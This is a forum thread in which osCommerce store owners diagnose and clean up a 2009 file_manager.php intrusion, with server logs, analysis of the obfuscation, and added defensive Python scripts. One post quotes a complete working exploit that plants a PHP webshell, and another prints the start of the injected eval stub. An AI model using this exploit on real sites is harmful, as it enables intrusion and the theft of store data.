
Weedwaka

Did Someone hack my site ? ( Eval Base64 Decode )


I was doing some updating on my site and I noticed some strange code appearing in all of my php files at the top.

What is this? I sure as hell did not put it there. Should I erase it all?

Can I tell when it was added?

<?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ3NoX25vJ10p


Hi David

I have found this crap also on my site over the last couple of days, but I believe it has a very sinister reason for being there. I am waiting for a response from 1 customer, but I believe Paypal payments have been directed somewhere else from the shopping cart, which normally comes back to the site awaiting verification.

Anyone else finding this code embedded in your php code should follow said advice. I am in the process of getting rid, but it seems to be in nearly every php file. My permissions on my main site were set not to allow this kind of thing to happen, as far as I was led to believe anyway, but I guess these b******s have got nothing better to do.

If you come up with any solutions let me know

Cheers

Gary


I got hacked by the same thing. It appears to randomly seek out some file to put its main code into; in my case it's in a style.css.php buried deep into a subdomain. The wild thing is, this subdomain (being in a subfolder of my main catalog folder) is running Joomla, and not osCommerce, but the infection came from osCommerce. So it must have searched for style.css.php and simply infected one it found, regardless of where that was. It put some 128 kB of scripting code into this file, base64 encoded TWICE!!! You decode it once, and get base64_decode again; after decoding that, I get a whole bunch of functions with mangled names, so that it becomes less than obvious to analyse the code. I have only started to look and figure out what it does. Part of the code will put a small stub (again base64 encoded) into each and every .php file within your domain, that makes sure this thing gets called whenever anyone hits your site.

If there is anyone here interested in finding out what this thing does, I could mail you the code (decoded version). It is way too long to post.

I reinstalled the entire site from a backup to make sure all traces have been removed. My main concern now is to find out how they sneaked in and how to close the hole. As a potential starting point these lines from the server log might be helpful:

94.142.129.147 - - [04/Sep/2009:16:45:25 -0500] "POST /admin/file_manager.php/login.php?action=save HTTP/1.1" 302 - "http://www.pipeloops.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.7) Gecko/2009021910 Firefox/3.0.7"
94.142.129.147 - - [04/Sep/2009:16:45:26 -0500] "GET /admin/file_manager.php?info=main.inc.php&osCAdminID=f983a9883258789a847ef8ba20a0c26b HTTP/1.1" 302 - "http://www.pipeloops.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.7) Gecko/2009021910 Firefox/3.0.7"
94.142.129.147 - - [04/Sep/2009:16:45:27 -0500] "GET /admin/login.php?osCAdminID=f983a9883258789a847ef8ba20a0c26b HTTP/1.1" 200 3626 "http://www.pipeloops.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.7) Gecko/2009021910 Firefox/3.0.7"
94.142.129.147 - - [04/Sep/2009:16:45:27 -0500] "GET /main.inc.php?dginit HTTP/1.1" 200 481708 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.7) Gecko/2009021910 Firefox/3.0.7"

Quite obviously it somehow managed to get into the admin file manager. The IP, btw, is from Latvia. I suppose main.inc.php (see the log snippet above) was POSTed to the server and then executed to infect the site. Needless to say, the Security Pro and the anti-XSS contrib are both installed and running on the site.

I'm thankful for any insight into how to avoid such attacks in the future.

Good thing I had a recent backup!!!

Regards

Reiner

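Reiner's log excerpt shows the sequence a store owner would want to catch in the access log: a POST to file_manager.php with an extra path segment and action=save, followed by a request to the file that was just written. The following is an added example (not code from this thread or from osCommerce) that parses combined-format log lines and flags that pattern; the sample lines and client IPs are constructed.

```python
"""Flag osCommerce admin file-manager activity in an Apache combined log.
Added example (not code from the thread or from osCommerce). The log lines
below are constructed to mirror the shape of the ones posted in the thread;
the client IPs are documentation-range placeholders."""
import re
from urllib.parse import parse_qs, urlsplit

# Combined log format: ip ident user [time] "METHOD target PROTO" status size "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Constructed sample: one client that writes a file through the file manager
# and then requests it, plus an ordinary shopper who also opened the file manager.
SAMPLE_LOG = """\
203.0.113.5 - - [04/Sep/2009:16:45:25 -0500] "POST /admin/file_manager.php/login.php?action=save HTTP/1.1" 302 - "-" "Mozilla/5.0"
203.0.113.5 - - [04/Sep/2009:16:45:27 -0500] "GET /main.inc.php?dginit HTTP/1.1" 200 481708 "-" "Mozilla/5.0"
198.51.100.7 - - [04/Sep/2009:16:46:02 -0500] "GET /product_info.php?products_id=12 HTTP/1.1" 200 9120 "-" "Mozilla/5.0"
198.51.100.7 - - [04/Sep/2009:16:47:10 -0500] "GET /admin/file_manager.php?info=main.inc.php HTTP/1.1" 200 3626 "-" "Mozilla/5.0"
""".splitlines()


def parse_line(line):
    """Split one combined-format line into its fields, or return None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    url = urlsplit(rec["target"])
    rec["path"] = url.path
    rec["query"] = parse_qs(url.query, keep_blank_values=True)
    return rec


def classify(rec):
    """Return the reasons a request is suspicious; an empty list means it looks ordinary."""
    reasons = []
    path = rec["path"]
    if "file_manager.php" in path:
        # Any use of the admin file manager is worth reviewing; the thread's
        # advice is to delete or rename it altogether.
        reasons.append("admin file manager accessed")
    if "file_manager.php/" in path:
        # Extra path segment after the script name, as in the logged
        # POST to file_manager.php/login.php?action=save
        reasons.append("extra path segment after file_manager.php")
    if "file_manager.php" in path and rec["method"] == "POST" \
            and rec["query"].get("action") == ["save"]:
        reasons.append("file written through the admin file manager")
    return reasons


def analyze(lines):
    """Parse every line, flag suspicious requests, and list the follow-up
    requests made by any client that wrote a file through the file manager."""
    records = [r for r in (parse_line(l) for l in lines) if r]
    alerts, writers = [], set()
    for rec in records:
        reasons = classify(rec)
        if reasons:
            alerts.append((rec["ip"], rec["method"], rec["target"], reasons))
        if any(r.startswith("file written") for r in reasons):
            writers.add(rec["ip"])
    followups = [(r["ip"], r["method"], r["path"]) for r in records
                 if r["ip"] in writers and not classify(r)]
    return alerts, followups


if __name__ == "__main__":
    found, after = analyze(SAMPLE_LOG)
    for ip, method, target, reasons in found:
        print(f"{ip} {method} {target}: {'; '.join(reasons)}")
    for ip, method, path in after:
        print(f"follow-up by {ip}: {method} {path} (check whether this file belongs to the store)")
```

Run it over the real access log instead of SAMPLE_LOG, and compare every follow-up path against a clean backup of the store.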

Well I have managed to delete most of it without scrubbing the site. My worst fears about Paypal redirection were not correct. I was in panic mode (as you do), but somehow it doesn't like to be deleted from account.php & account_edit.php without causing some scripting errors on the site. I do have backups which are available, albeit a little older. I haven't attempted this from scratch as yet, so do you re-install osc then use the backup to get the site back as it was?

My counterpart in the US is also looking into what can be done. Deleting it piecemeal and seeing what happens is a slow process to eliminate the eval text. At least as far as I can tell, what I have deleted hasn't re-written itself to the same files again, but is there an easier way?

Thanks for the input anyway, it all adds to fitting some sort of puzzle together.


At least I am not alone. I feel better that people with real knowledge of php / osCommerce are on the hunt for a fix now.

What I did was pull the site onto my hard drive via ftp and do a search and replace to get rid of all the "top paragraph" style code which was placed in each .php file. I then looked for obvious files which were larger or did not match my older backup and removed them or copied over them.

I am having big problems with the site still as I can't get access to my admin panel and do not know why. It just opens a blank page and nothing happens. Aaaarg.

I think we will start seeing many more people showing up looking for help on this... hopefully we can figure this out.


Start reading here

 

Specifically my post about changing error_reporting and the posts by steve_s about getting it to write the errors to a log file.


If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you.

 

"Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice."

- Me -

 

"Headers already sent" - The definitive help

 

"Cannot redeclare ..." - How to find/fix it

 

SSL Implementation Help

 


I don't know if it's mentioned here already, I've not read through the whole thread, but it's clear that this hack would have been prevented by:

1. Renaming the admin folder

2. Deleting File Manager from admin.

Both those security risks have been detailed here many times.

 

Regular backups are also essential:

 

Use AutoBackup Database in Admin http://addons.oscommerce.com/info/2314

AND Database backup manager http://addons.oscommerce.com/info/5769

also Backup of all store files in zip format http://addons.oscommerce.com/info/6986


Sam

 

Remember, what you think I meant may not be what I thought I meant when I said it.

 

Contributions:

 

Auto Backup your Database, Easy way

 

Multi Images with Fancy Pop-ups, Easy way

 

Products in columns with multi buy etc etc

 

Disable any Category or Product, Easy way

 

Secure & Improve your account pages et al.


Thanks Germ!!

I do get an error instead of a blank page now after changing my password in the file to match a new one I was forced to use for the site's control panel.

"Unable to connect to database server!"


If your catalog side is working, look in the /catalog/includes/configure.php file

Particularly these lines:

define('DB_SERVER', ''); // eg, localhost - should not be empty for productive servers
define('DB_SERVER_USERNAME', '');
define('DB_SERVER_PASSWORD', '');
define('DB_DATABASE', '');

Whatever is in these lines on the catalog side needs to be repeated in the admin side configure file (if the catalog is functional).

Also be aware of this:

In the includes FOLDER (catalog and admin) where the normal configure.php files are, there is a FOLDER named local.

On some installs there may be a configure.php inside the local FOLDER (catalog and admin).

If there is, anything in it overrides anything in the normal configure.php files.



Hello all,

of course Sam's post above is right: this attack would have been prevented with admin renamed and filemanager removed, since this is the door the hacker used. It is frightening though how easy it seems to be to get code into a site if you only know the name and path to a vulnerable script.

BTW, I did not reinstall osCommerce; basically I renamed my top-level folder and then loaded up everything from the backup, which I had done after the last change to my files. I only needed to move a few binary files from the old folder to the new one; all in all it took about an hour to get back online (most of that time was the time it took to upload everything).

I also analysed the code a bit and will do a bit more of that this evening. It looks to me as if the hacker put a file called main.inc.php on the server using file_manager and then executed the script contained in this file by calling it up in the browser. The script then looked for a nice cozy place to bury its files deep down in the vaults of the store, in my case within a subdomain running Joomla. It put several files in there, one of them being style.css.php, and hence executable by the browser. This file contains the actual code. First of all it includes code to put a small stub (base64 encoded) into each and every php file on the site. This stub contains code that looks for the malicious style.css.php file and loads it any time a page is loaded. It then calls some function buried within the style.css.php file.

The style.css.php is actually base64-encoded twice, i.e. after decoding it, you get a set of about 45 eval(base64_decode(...)) blocks. After decoding these you have the malware scripts. I have not yet fully discovered what this code does; it is written explicitly to be hard to follow (all function names and variables are mangled, so that it is hard to trace). I did find a few URLs inside (these were again encoded within the script to hide them), and, interestingly enough, a small text in a most likely eastern European language, that includes the e-mail of the attacker. I am very curious what this text means. If I don't succeed in translating it, I'll post it here this evening and see if someone on the forum can figure it out. The code does have logic included to log in somewhere (presumably on one of the URLs I found), and it does have some formatting code and the like. I assume it does log the inputs done by the store users and puts them into nicely formatted pages on the hacker's site, so he can get at the collected data easily. I also found out that there are no SQL statements inside the code, so it does not appear to sniff inside the database.

Hope someone here finds this interesting.

After posting this it occurred to me that the hacker will find this also interesting, and maybe change the names of his servers to hide himself?

Regards

Reiner


Thanks for the help.

The catalog itself is up and running fine with the exception of a new product carousel which can no longer find and display the products.

I checked these config files and they do match. I do not have the extra config file in the local folder. Still getting the "unable to connect to database server" warning.

I am sure it's something simple I am missing, arg!! Any more ideas?

Thanks again!!


On further investigating the hack, I was able to decode the file s.php that it had put on the server. It actually needed gzinflate(base64_decode(...)) 48 times before the script appeared. What I got then was a well known hacker's tool, c99madshell; just google for it and you know it's pretty dangerous. Don't know what the guy was up to on my site with this.

If you have been hacked by this, go and look for the additional .php files (s.php, dg.php, in my case also style.css.php) and DELETE them!!!

Reiner

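Reiner describes two layers of obfuscation in this thread: the stub prepended to every .php file, base64-encoded twice, and an s.php that needed gzinflate(base64_decode(...)) 48 times. The following added example (not code from the thread or from osCommerce) peels those wrappers statically, that is without ever executing the PHP, and strips the prepended stub from a file; the payload and the stub layout it assumes are constructed.

```python
"""Peel eval(base64_decode(...)) / eval(gzinflate(base64_decode(...))) wrappers
statically, i.e. without running any PHP, and strip the prepended stub from an
infected file. Added example (not code from the thread or from osCommerce);
the payload and the stub layout it assumes are constructed."""
import base64
import re
import zlib

# One wrapper layer. The (?(inflate)...) conditional consumes gzinflate's
# closing parenthesis only when the gzinflate( prefix was present.
LAYER_RE = re.compile(
    r"""eval\s*\(\s*(?P<inflate>gzinflate\s*\(\s*)?base64_decode\s*\(\s*"""
    r"""['"](?P<b64>[A-Za-z0-9+/=\s]+)['"]\s*\)(?(inflate)\s*\))\s*\)\s*;?"""
)
STUB_HEAD = "<?php /**/eval(base64_decode("   # prefix seen at the top of every infected file


def unwrap(php_src, max_layers=100):
    """Return (innermost_source, layers): layers names each wrapper peeled, outermost first."""
    src, layers = php_src, []
    for _ in range(max_layers):
        m = LAYER_RE.search(src)
        if not m:
            break
        raw = base64.b64decode(re.sub(r"\s+", "", m.group("b64")), validate=True)
        if m.group("inflate"):
            raw = zlib.decompress(raw, -zlib.MAX_WBITS)  # raw DEFLATE, what PHP gzinflate() expects
            layers.append("gzinflate+base64")
        else:
            layers.append("base64")
        src = raw.decode("utf-8", errors="replace")
    return src, layers


def strip_leading_stub(text):
    """Remove the one-statement stub from the top of a file, keeping the file's own
    opening tag. Returns (cleaned_text, was_infected). Assumed layout (constructed):
    '<?php /**/eval(base64_decode('...'));' optionally followed by '?>' and a fresh '<?php'."""
    if not text.startswith(STUB_HEAD):
        return text, False
    m = LAYER_RE.match(text, len("<?php /**/"))
    if not m:
        return text, False
    rest = re.sub(r"^\s*\?>\s*(<\?php)?", "", text[m.end():], count=1)
    if not rest[:1].isspace():
        rest = " " + rest
    return "<?php" + rest, True


# Helpers that build the constructed sample the same way the obfuscator would.
def wrap_base64(code):
    return "eval(base64_decode('%s'));" % base64.b64encode(code.encode()).decode()


def wrap_gzinflate(code):
    c = zlib.compressobj(9, zlib.DEFLATED, -zlib.MAX_WBITS)  # raw DEFLATE = PHP gzdeflate()
    data = c.compress(code.encode()) + c.flush()
    return "eval(gzinflate(base64_decode('%s')));" % base64.b64encode(data).decode()


INNER = "echo 'harmless stand-in for the malware body';"   # constructed
SAMPLE = "<?php /**/" + wrap_base64(wrap_base64(wrap_gzinflate(wrap_gzinflate(INNER))))
CLEAN_FILE = "<?php\necho 'original store code';\n"         # constructed
INFECTED_FILE = "<?php /**/" + wrap_base64(INNER) + " ?>" + CLEAN_FILE

if __name__ == "__main__":
    body, layers = unwrap(SAMPLE)
    print(layers, "->", body)
    cleaned, hit = strip_leading_stub(INFECTED_FILE)
    print(hit, repr(cleaned))
```

Decoded output is for reading only; compare the cleaned files against a known-good backup rather than trusting the strip alone, since the thread reports extra dropped files (s.php, dg.php, style.css.php) that a stub scan will not find.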

Thanks for all the info... I would like to say however that I'm not a tech web guy at all and I am just trying to run a business, not a website guru tech guy to boot. There is a wealth of info out there, but not being into coding as such to start with is a lot to take on, without all the other hassle; all I'm trying to do is earn a crust! These permissions things should be set up as a rule by the software if it's that easy to manage, and ideally all that security stuff as well.

Still you live and learn (normally the hard way by experience) so thanks again guys for all this.

Cheers

Gaz


In some design/development companies this sort of encoding is used when clients are very dodgy with payment for their project, and it's the only way to limit or show the full working demo for the client - encode the whole work.

Please read this line: Do you want to find all the answers to your questions? Click here. As for the contribution database, it's located here!

8 people out of 10 don't bother to read installation manuals. I can recommend: if you can't read the installation manual, don't bother to install any contribution yourself.

Before installing a contribution or editing/updating/deleting any files, do a full backup; it will save you & everyone here on the forum time to fix your issues.

Any issues with osCommerce, I am here to help you.


Yeah, I found these as well in the same folder.


Thanks for the links, Spooks. I looked at the 3rd one to back up the files and it was in Spanish and says to put the backup file on the root (and being suddenly paranoid due to this base64 decode injection and how this person found my website, which is still in development!), I'm wondering if this can be exploited by calling it in the browser for some nefarious purpose, especially cuz I no comprende the Spanish code - ah, guess that's what happens when you're violated; certainly has been a learning experience regarding security precautions.

Nice work, Reiner, investigating this insidious code. I am hopeful that by removing the decode the rest of the file is intact, or is there a possibility that something else is embedded in each file that I should be on the lookout for?

Here is a link to a good article regarding hacker minimizing steps:

http://www.clubosc.com/hacked-oscommerce-e...al-reading.html

jk

Folder permissions should NEVER be higher than 755 - EVER.

These hackers can even get behind the .htaccess file "protecting" the admin if there is a folder back there with 777 permissions. I've seen it happen.

Please note in the osCommerce 2.2 Milestone 2 Update 051112 Documentation on page 9:

Set the permissions on /catalog/images directory to 777.
Reset the permissions on /catalog/admin/includes/configure.php to 644.
Create the dir /catalog/admin/backups and set the permissions to 777.
Set the permissions on /catalog/admin/images/graphs directory to 777.

I followed the instructions that come with the above documentation and you say to change it. Why doesn't the documentation explain what you are saying? Will the documentation be updated with what you are saying now?


Aloha Sam,

This is the first time I have read to DELETE the file manager from admin. Can you give step-by-step directions? I am assuming you mean the File Manager in the TOOLS section of the admin panel? Step-by-step directions should be given for this one. I haven't a clue how to do this. That means that an integral part of the admin panel needs to be removed. By the way, why would this be necessary? Why can't this feature be secure while other parts of the admin control panel are left? Why pick out this particular feature and remove it?

The way this hack has shown up in the past ten days or so seems to indicate a big deal, doesn't it?


I would like to delete the file manager also.


Maybe someone could start a sticky with just information (FACTS ONLY) on this hack: files to look for and known behavior.

I think many more people are going to be hit with this and will be coming here for help.

In the admin directory delete or rename file_manager.php. If you choose to rename it, the safest is to make sure you rename the extension, so it is not a php file any more.

You should also rename your admin folder. If you do this, make sure you edit the configure.php file in the admin/includes folder. This file defines where the admin files are located and so contains references to the "admin" folder. These need to be changed to the new name. This should help to hide potentially vulnerable files from attackers.

BTW, I still have not figured out HOW the attacker got into my site, only that he managed to get into the file manager. I also have no idea yet what the scripts did when a user visited my store. But I must say this hack is pretty sophisticated; it installed both a backdoor for the hacker (c99madshell), and also scripts that get executed with every hit on your site.


The "HOW" is clear now. Googling for file_manager.php brought me to a security report for code injection into file_manager.php in osCommerce RC2.2a. No fix is known yet (other than renaming or deleting file_manager.php).

Here is the exploit:

<?php
print_r('
+---------------------------------------------------------------------------+
osCommerce Online Merchant 2.2 RC2a RCE Exploit
by Flyh4t
mail: phpsec@hotmail.com
team: http://www.wolvez.org
dork: Powered by osCommerce
Gr44tz to q1ur3n 、puret_t、uk、toby57 and all the other members of WST
Thx to exploits of blackh
+---------------------------------------------------------------------------+
');
$host ='democn.51osc.com';
$path = '/';
$admin_path = 'admin/';
$shellcode = "filename=fly.php&file_contents=test<?php%20@eval(\$_POST[aifly]);?>";
$message="POST ".$path.$admin_path."file_manager.php/login.php?action=save HTTP/1.1\r\n";
$message.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";
$message.="Accept-Language: zh-cn\r\n";
$message.="Content-Type: application/x-www-form-urlencoded\r\n";
$message.="Accept-Encoding: gzip, deflate\r\n";
$message.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";
$message.="Host: $host\r\n";
$message.="Content-Length: ".strlen($shellcode)."\r\n";
$message.="Connection: Close\r\n\r\n";
$message.=$shellcode;
$fd = fsockopen($host,'80');
if(!$fd)
{
echo '[~]No response from'.$host;
die;
}
fputs($fd,$message);
echo ("[+]Go to see U webshell : $host/fly.php");
?>

# milw0rm.com [2009-08-31]

 

SO: DELETE OR RENAME THE FILE MANAGER!!!


In attempting to discover how this hacker found my site since it's relatively new, I wonder if it's by googling for the information in the footer, either the osCommerce logo or "powered by oscommerce", which would have potentially identified my site. For now I'm going to remove that footer tag and logo. I have also read some info on this c99madshell script - very sobering indeed. Is it true that merely browsing to an infected site exposes the user to infiltration?! I'm even wondering if this script is embedded in any osCommerce contributions! I'm not sure if a contribution is scanned or sanitized or simply made available as is with the "use at your own risk" caveat. Hopefully I'm just being unnecessarily concerned (read paranoid) as to the extent of this hacker script, but I can envision how this code can spread its tentacles exponentially until it's not a virus, it's an internet plague!

I sincerely hope someone will chide me for this post and correct these irrational misgivings - cuz right now I am doing la freak!

 

jk


A client of ours had his site compromised on the 04 Sept at 19:00; almost the same time as a couple of you.

I found the extra files in:

/catalog/admin/includes/languages/english/images/buttons/

These were the same as blueflametuna except I did not find style.css.php.orig.

I have removed the file_manager.php script - what negative effects will this have on using the admin?

Either way it's got to be better than being hacked again.

Thanks for all the useful information posted so far.

It would be useful to have a dedicated forum for security updates which you could then subscribe to. Unless there is already a security announcement list which I am not aware of?


In comparing an earlier copy of a site backup with the copy of the hacked site, I noticed in the root directory of the hacked site was a jpeg with a name that looks kinda unusual and wasn't in the earlier backup copy of the site.

The name of the jpeg was: -57x40.jpgs-57x40.jpgl-57x40. I didn't click on it so as not to disturb it.

I had added some contributions in between and am not sure if this is a legitimate name for a jpeg or something more sinister, but thought I'd mention it in case it is connected with this hack or someone can explain what it's for...

 

jk
